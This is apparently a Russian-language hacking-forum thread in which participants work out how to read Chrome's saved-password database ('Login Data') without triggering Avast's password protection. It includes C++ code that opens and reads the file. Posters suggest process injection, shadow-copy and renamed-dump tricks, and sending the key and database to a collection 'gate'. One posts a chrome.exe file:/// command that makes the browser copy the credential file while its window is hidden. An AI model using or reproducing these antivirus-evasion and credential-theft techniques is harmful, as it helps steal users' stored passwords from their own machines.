Avast Password Protection

Jeffs · 22.07.2020

При попытке прочитать/скопировать базу данных хрома ловлю предупреждение от аваста:

У кого какие предложения есть по обходу этой защиты?

Jeffs · 22.07.2020

Детект идёт на CreateFile с флагом GENERIC_READ.
Исходник:

C++:

#include <Windows.h>
#include <ShlObj.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    char appDataPath[MAX_PATH];
    SHGetFolderPathA(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appDataPath);

    char chromeData[MAX_PATH];
    lstrcpyA(chromeData, appDataPath);
    lstrcatA(chromeData, "\\Google\\Chrome\\User Data\\Default\\Login Data");
    HANDLE hFile = CreateFileA(chromeData, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        DWORD fileSize = GetFileSize(hFile, 0);
        char* fileData = (char*)malloc(fileSize);
        if (fileData)
        {
            DWORD readed;
            ReadFile(hFile, fileData, fileSize, &readed, NULL);
            free(fileData);
        }
        CloseHandle(hFile);
    }
    return 0;
}

Jeffs · 22.07.2020

Батники, системные утилиты мимо:

Apocalypse · 22.07.2020

А если через NtOpenFile/NtCreateFile? Или инжект в процесс хрома и работать из него?

Jeffs · 22.07.2020

Apocalypse сказал(а):

А если через NtOpenFile/NtCreateFile?

Та же шляпа.

Apocalypse сказал(а):

Или инжект в процесс хрома и работать из него?

Скорее всего это единственный вариант

Jeffs · 22.07.2020

Интересно, а на что НЕ детектит аваст?

Благо эта защита только в прем-версии аваста

Apocalypse · 22.07.2020

Посмотри может оно хукает чего в юзер моде?

Pernat1y · 22.07.2020

Можно попробовать, например
1. Обращаться к файлам через ярлык
2. Скопировать файл чем-то типа VSS. Данный подход довольно много проблем решает.

Jeffs · 22.07.2020

Pernat1y сказал(а):

1. Обращаться к файлам через ярлык

Через ярлык, насколько я знаю, можно только получить путь до файла, аргументы и тд?

Pernat1y сказал(а):

3. Скопировать файл чем-то типа VSS. Данный подход довольно много проблем решает.

Тип создать теневую копию и работать уже с ней?

tilekvj · 22.07.2020

Создай тупо дамп файла в этой же папке и работай с ним. И не придется отключать браузер. На CopyFile не реагируют обычно. Но при каждом дампе меня имя файла, чтоб потом не спалил ав.

tilekvj · 22.07.2020

А вообще, есло хром версии 80, то можно прост ключ взять + данные бд. Все это записать в память (zlib в помощь) отправить на гейт и все ок. А если дпапи, то как уже сказал дамп поработать и удалить

Jeffs · 22.07.2020

tilekvj не понимаешь о чём этот топик

tilekvj · 22.07.2020

Jeffs сказал(а):

tilekvj не понимаешь о чём этот топик

сорь, не заметил "скопировать"

Haunt · 22.07.2020

У вас должно быть более 100 реакций для просмотра скрытого контента.

Попробуй так запускать хром.
"chrome.exe" file:///{{Disk}}:/Users/{{User_Name}}/AppData/Local/Google/Chrome/User%20Data/Default/Login%20Data
В путях загрузок хрома должен появиться Login Data. Т.е произойдет "загрузка файла" процессом хрома, а по факту копирование Login Data из Default папки в папку Downloads или какая там выставлена как путь для загрузок.
Само окно хрома я думаю догадаешься как прятать.
PS. в headless моде не сработает, по этому прячь по другому.

Pernat1y · 22.07.2020

Jeffs сказал(а):

Через ярлык, насколько я знаю, можно только получить путь до файла, аргументы и тд?

Как я понял из MSDN, с ярлыками можно работать как с обычными файлами:

Programming Considerations (Local File Systems) - Win32 apps

Programming considerations for working with symbolic links.

docs.microsoft.com

Jeffs сказал(а):

Тип создать теневую копию и работать уже с ней?

Есть софт, который позволяет копировать файлы через VSS, типа Runtime shadowcopy. Расковырять и посмотреть, как там это реализовано.

WildMilk · 22.07.2020

Jeffs сказал(а):

Интересно, а на что НЕ детектит аваст?

Благо эта защита только в прем-версии аваста

он же тебя детектит как рансомваре

в первом случае была защита пароля.

Jeffs · 22.07.2020

Pernat1y сказал(а):

Как я понял из MSDN, с ярлыками можно работать как с обычными файлами:

Programming Considerations (Local File Systems) - Win32 apps

Programming considerations for working with symbolic links.

docs.microsoft.com

Есть софт, который позволяет копировать файлы через VSS, типа Runtime shadowcopy. Расковырять и посмотреть, как там это реализовано.

Читал про vssapi, мутки с битностью. С ярлыками чуть позже гляну. Решение от Haunt оптимально, как по мне

Jeffs · 22.07.2020

WildMilk сказал(а):

он же тебя детектит как рансомваре в первом случае была защита пароля.

Да не может быть, врëшь?)

tilekvj · 22.07.2020

Haunt сказал(а):

Скрытое содержимое

можно примерный концепт... где и куда глянуть для реализации....

Haunt · 22.07.2020

tilekvj сказал(а):

можно примерный концепт... где и куда глянуть для реализации....

ну как бы мутки от имени хрома, только не инжект, а кое что другое

Avast Password Protection

(L1) cache

(L1) cache

(L1) cache

CPU register

(L1) cache

(L1) cache

CPU register

CPU register

(L1) cache

(L1) cache

(L1) cache

(L1) cache

(L1) cache

PWSH

CPU register

CD-диск

(L1) cache

(L1) cache

(L1) cache

PWSH